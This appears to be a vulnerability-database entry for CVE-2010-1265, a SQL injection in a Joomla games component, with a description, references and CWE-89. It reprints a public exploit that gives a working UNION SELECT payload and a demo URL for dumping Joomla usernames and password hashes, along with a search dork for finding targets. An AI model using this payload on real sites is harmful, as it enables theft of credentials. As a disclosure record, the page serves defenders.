CVE-2010-1265
Description
SQL injection vulnerability in Adam Corley dcsFlashGames (com_dcs_flashgames) allows remote attackers to execute arbitrary SQL commands via the catid parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component dcsFlashGames 2.0RC1 - 'catid' SQL Injection
[!]===========================================================================[!]
[~] Joomla Component dcsFlashGames SQL Vulnerability ( catid )
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 25 March, 2010
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : http://ekith.com/
[+] Description : http://ext.joom.ru/dcsflashgames.html
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/project/sageth/frs/
[+] Version : 2.0RC1
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&catid=[INDONESIANCODER]
[ XpL ]
666+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--
[ d3m0 ]
http://server/index.php?option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--
etc etc etc ;]
[!]===========================================================================[!]
[ Thx TO ]
[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31
[ NOTE ]
[+] Babe enyak adek i love u pull dah ..
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ayy : lup u :">
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] nothing secure ..Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| ekith | com_dcs_flashgames | | |
| ekith | com_dcs_flashgames | 2.0 | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1003-exploits/joomladcsflashgames-sql.txt
- http://secunia.com/advisories/39161
- http://www.exploit-db.com/exploits/11884
- http://www.securityfocus.com/bid/38981
- http://packetstormsecurity.org/1003-exploits/joomladcsflashgames-sql.txt
- http://secunia.com/advisories/39161
- http://www.exploit-db.com/exploits/11884
- http://www.securityfocus.com/bid/38981
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.